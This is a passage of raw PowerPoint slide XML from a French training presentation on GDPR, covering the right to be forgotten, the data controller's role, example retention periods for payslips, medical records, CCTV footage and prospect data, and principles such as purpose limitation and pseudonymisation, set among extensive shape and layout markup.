            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Préserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> le « droit à l’oubli » ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Effacer les données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Anonymiser les données afin de rendre impossible l’identification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Archiver les données sous certaines conditions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Qui décide des actions et du temps ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0"/>
              <a:t>Le Responsable de Traitement </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118592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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conservation des données - Exemples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0746B816-60C1-4057-BD12-EA244C2F55B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="1786168"/>
            <a:ext cx="10118912" cy="4935307"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bulletin de paie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conserver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 ans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>après la remise au salarié</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Dossier médical </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conserver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10 ans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>après consolidation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Certains fichiers de gestion du personnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> jusqu’à liquidation des droits à la retraite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Images de vidéosurveillance </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conserver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 mois </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>après la capture sauf instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Données de prospection (non client) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conserver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 ans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>après dernier contact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168103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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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695324" y="897754"/>
            <a:ext cx="11385514" cy="1049380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les grands principes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 8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74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69AB879-205A-412F-9273-8A7F5A0262C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="6273311" y="1472962"/>
            <a:ext cx="5930089" cy="1296050"/>
            <a:chOff x="0" y="1409269"/>
            <a:chExt cx="5918688" cy="1305074"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="2AB59F"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DA7D1F6-70AE-43C5-9E9B-F7FBA7B16840}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1409269"/>
              <a:ext cx="4030249" cy="654374"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="76ABDC"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="76A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31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Arrow: Left 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F94A361B-2BF0-4730-8773-1D293FA36DD2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13391102">
              <a:off x="3010476" y="1616585"/>
              <a:ext cx="2908212" cy="1097758"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY3" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2908212 w 2908212"/>
                <a:gd name="connsiteY3" fmla="*/ 221698 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2908212"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 109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8212" h="1097758">
                  <a:moveTo>
                    <a:pt x="0" y="548879"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="859007" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="226725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908212" y="221698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216226" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="1097758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548879"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B9D4ED"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="B9D4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31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8670A2C-22AF-4803-A4BF-C86D9DDD9B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="1475768"/>
            <a:ext cx="5930089" cy="1294485"/>
            <a:chOff x="0" y="1409269"/>
            <a:chExt cx="5918688" cy="1303498"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="2AB59F"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E27FF3C3-BC40-491E-957F-F55ECC00D530}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1409269"/>
              <a:ext cx="4030249" cy="654374"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="76ABDC"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="76A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31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Arrow: Left 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4632B53E-7C15-4F14-8202-9C500EBF9260}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13391102">
              <a:off x="3010476" y="1615009"/>
              <a:ext cx="2908212" cy="1097758"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY3" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2908212 w 2908212"/>
                <a:gd name="connsiteY3" fmla="*/ 221698 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2908212"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 109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8212" h="1097758">
                  <a:moveTo>
                    <a:pt x="0" y="548879"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="859007" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="226725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908212" y="221698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216226" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="1097758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548879"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B9D4ED"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="B9D4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31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{584BF60F-2284-4AAE-A915-8056B5AE1DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202328" y="2287564"/>
            <a:ext cx="3586034" cy="702992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Possible que pour une finalité précise et légitime</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03BBCA92-8E60-4A66-8896-56C246764BAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7732524" y="2287564"/>
            <a:ext cx="4302650" cy="702992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pseudonymisation, anonymisation, transparence et information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17CF9227-E968-483B-B771-E3016759C3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="0" y="5150043"/>
            <a:ext cx="5930089" cy="1294485"/>
            <a:chOff x="0" y="1409269"/>
            <a:chExt cx="5918688" cy="1303498"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="2AB59F"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D0C6CE-0496-49E7-B3CB-12C4FED7294B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1409269"/>
              <a:ext cx="4030249" cy="654374"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="76ABDC"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="76A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20" name="Arrow: Left 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71935EB4-83B4-4280-990B-2EF4E9E6C3B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13391102">
              <a:off x="3010476" y="1615009"/>
              <a:ext cx="2908212" cy="1097758"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2216226 w 2216226"/>
